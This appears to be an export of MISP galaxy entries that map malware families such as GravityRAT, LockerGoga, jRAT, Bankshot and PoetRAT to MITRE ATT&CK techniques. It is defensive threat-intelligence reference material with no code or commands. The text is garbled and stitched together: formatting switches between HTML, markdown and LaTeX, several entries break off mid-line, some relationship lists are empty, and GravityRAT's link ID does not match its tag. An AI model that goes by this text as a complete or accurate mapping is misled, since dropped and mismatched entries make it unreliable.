• uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

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<table>
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<tr>
<th>Links</th>
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<tr>
<td><a href="https://attack.mitre.org/software/S0236">GravityRAT</a> is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are &quot;TheMartian&quot; and &quot;The Invincible.&quot;</td>
</tr>
</tbody>
</table>

GravityRAT - S0237

[GravityRAT](https://attack.mitre.org/software/S0236) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible."
According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)

The tag is: `misp-galaxy:mitre-malware="GravityRAT - S0237"`

GravityRAT - S0237 is also known as:

- GravityRAT

GravityRAT - S0237 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 4729. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0237">https://attack.mitre.org/software/S0237</a></td>
</tr>
</tbody>
</table>

**LockerGoga - S0372**

[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)

The tag is: *misp-galaxy:mitre-malware="LockerGoga - S0372"*

LockerGoga - S0372 is also known as:

- LockerGoga

LockerGoga - S0372 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"


Table 4730. Table References
Sockbot - S0273

[Sockbot](https://attack.mitre.org/software/S0273) is a backdoor that abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)

The tag is: `misp-galaxy:mitre-malware="Sockbot - S0273"`

Sockbot - S0273 is also known as:

- Sockbot

Sockbot - S0273 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"

Skygofree - S0327

[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)

The tag is: `misp-galaxy:mitre-malware="Skygofree - S0327"`

Skygofree - S0327 is also known as:
Skygofree - S0327 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 4732. Table References

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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0327">https://attack.mitre.org/software/S0327</a></td>
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</tbody>
</table>

**jRAT - S0283**

[ jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [ jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model. (Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)

The tag is: **misp-galaxy:mitre-malware="jRAT - S0283"**

jRAT - S0283 is also known as:

- jRAT
- JSocket
- AlienSpy
- Frutas
- Sockrat
- Unrecom
jRAT - S0283 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0283">https://attack.mitre.org/software/S0283</a></td>
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</tbody>
</table>

ServHelper - S0382

[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-malware="ServHelper - S0382"

ServHelper - S0382 is also known as:

• ServHelper
ServHelper - S0382 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0382">https://attack.mitre.org/software/S0382</a></td>
</tr>
</tbody>
</table>

Proxysvc - S0238

[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It
has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)

The tag is: `misp-galaxy:mitre-malware="Proxysvc - S0238"`

Proxysvc - S0238 is also known as:

- Proxysvc

Proxysvc - S0238 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data Destruction - T1485"` with estimative-language:likelihood-probability="almost-certain"
BrainTest - S0293

[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. (Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)

The tag is: `misp-galaxy:mitre-malware="BrainTest - S0293"`

BrainTest - S0293 is also known as:

- BrainTest

BrainTest - S0293 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"` with estimative-language:likelihood-probability="almost-certain"

Bankshot - S0239

[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)

The tag is: `misp-galaxy:mitre-malware="Bankshot - S0239"`
Bankshot - S0239 is also known as:

- Bankshot
- Trojan Manuscript

Bankshot - S0239 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
Table 4737. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0239">https://attack.mitre.org/software/S0239</a></td>
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</table>

**Tangelo - S0329**

[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)

The tag is: `misp-galaxy:mitre-malware="Tangelo - S0329"`

Tangelo - S0329 is also known as:

- Tangelo

Tangelo - S0329 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4738. Table References

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<td><a href="https://attack.mitre.org/software/S0329">https://attack.mitre.org/software/S0329</a></td>
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</table>

VBShower - S0442

[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441). (Citation: Kaspersky Cloud Atlas August 2019)

The tag is: `misp-galaxy:mitre-malware="VBShower - S0442"`

VBShower - S0442 is also known as:

- VBShower

VBShower - S0442 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"


Table 4739. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0442">https://attack.mitre.org/software/S0442</a></td>
</tr>
</tbody>
</table>
**Comnie - S0244**

[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)

The tag is: `misp-galaxy:mitre-malware="Comnie - S0244"

Comnie - S0244 is also known as:

- Comnie

Comnie - S0244 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 4740. Table References

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<td><a href="https://attack.mitre.org/software/S0244">https://attack.mitre.org/software/S0244</a></td>
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</table>

**Triada - S0424**

[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps. (Citation: Kaspersky Triada March 2016)

The tag is: *misp-galaxy:mitre-malware="Triada - S0424"

Triada - S0424 is also known as:

• Triada

Triada - S0424 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-
BADCALL - S0245

[BADCALL](https://attack.mitre.org/software/S0245) is a Trojan malware variant used by the group [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT BADCALL)

The tag is: `misp-galaxy:mitre-malware="BADCALL - S0245"`

BADCALL - S0245 is also known as:

- BADCALL

BADCALL - S0245 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571"` with estimative-
PLAINTEE - S0254

[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)

The tag is: *misp-galaxy:mitre-malware="PLAINTEE - S0254"*

PLAINTEE - S0254 is also known as:

- PLAINTEE

PLAINTEE - S0254 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"* with estimative-language:likelihood-probability="almost-certain"
USBferry - S0452

[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: `misp-galaxy:mitre-malware="USBferry - S0452"`

USBferry - S0452 is also known as:

- USBferry

USBferry - S0452 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with `estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"` with `estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with `estimative-language:likelihood-probability="almost-certain"

CARROTBAT - S0462

[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356). (Citation: Unit 42 CARROTBAT November 2018) (Citation: Unit 42 CARROTBAT January 2020)

The tag is: misp-galaxy:mitre-malware="CARROTBAT - S0462"

CARROTBAT - S0462 is also known as:

- CARROTBAT

CARROTBAT - S0462 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

HARDRAIN - S0246

[HARDRAIN](https://attack.mitre.org/software/S0246) is a Trojan malware variant reportedly used
by the North Korean government. (Citation: US-CERT HARDRAIN March 2018)

The tag is: \textit{misp-galaxy:mitre-malware=“HARDRAIN - S0246”}

HARDRAIN - S0246 is also known as:

- HARDRAIN

HARDRAIN - S0246 has relationships with:

- uses: \textit{misp-galaxy:mitre-attack-pattern=“Disable or Modify System Firewall - T1562.004” with estimative-language:likelihood-probability=“almost-certain”}

Table 4746. Table References

\begin{tabular}{|l|}
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**Links**
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https://attack.mitre.org/software/S0246
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\end{tabular}

**OopsIE - S0264**

[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)

The tag is: \textit{misp-galaxy:mitre-malware=“OopsIE - S0264”}

OopsIE - S0264 is also known as:

- OopsIE

OopsIE - S0264 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

Table 4747. Table References

Links

https://attack.mitre.org/software/S0264

**NavRAT - S0247**

[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)

The tag is: `misp-galaxy:mitre-malware="NavRAT - S0247"`

NavRAT - S0247 is also known as:

- NavRAT

NavRAT - S0247 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"

*Table 4748. Table References*

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<td><a href="https://attack.mitre.org/software/S0247">https://attack.mitre.org/software/S0247</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2018/05/navrat.html">https://blog.talosintelligence.com/2018/05/navrat.html</a></td>
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</tbody>
</table>
Calisto - S0274

Calisto ([https://attack.mitre.org/software/S0274](https://attack.mitre.org/software/S0274)) is a macOS Trojan that opens a backdoor on the compromised machine. Calisto ([https://attack.mitre.org/software/S0274](https://attack.mitre.org/software/S0274)) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)

The tag is: `misp-galaxy:mitre-malware="Calisto - S0274"`

Calisto - S0274 is also known as:

- Calisto

Calisto - S0274 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keychain - T1555.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1136.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002"` with estimative-
TrickMo - S0427

[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany. (Citation: SecurityIntelligence TrickMo)

[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords. (Citation: SecurityIntelligence TrickMo)

The tag is: *misp-galaxy:mitre-malware="TrickMo - S0427"*

TrickMo - S0427 is also known as:

- TrickMo

TrickMo - S0427 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"*
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4750. Table References

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**down_new - S0472**

[down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: **misp-galaxy:mitre-malware="down_new - S0472"**

down_new - S0472 is also known as:

- down_new

down_new - S0472 has relationships with:


PoetRAT - S0428

[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)

The tag is: `misp-galaxy:mitre-malware="PoetRAT - S0428"`

PoetRAT - S0428 is also known as:

- PoetRAT

PoetRAT - S0428 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005"` with estimative-
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"


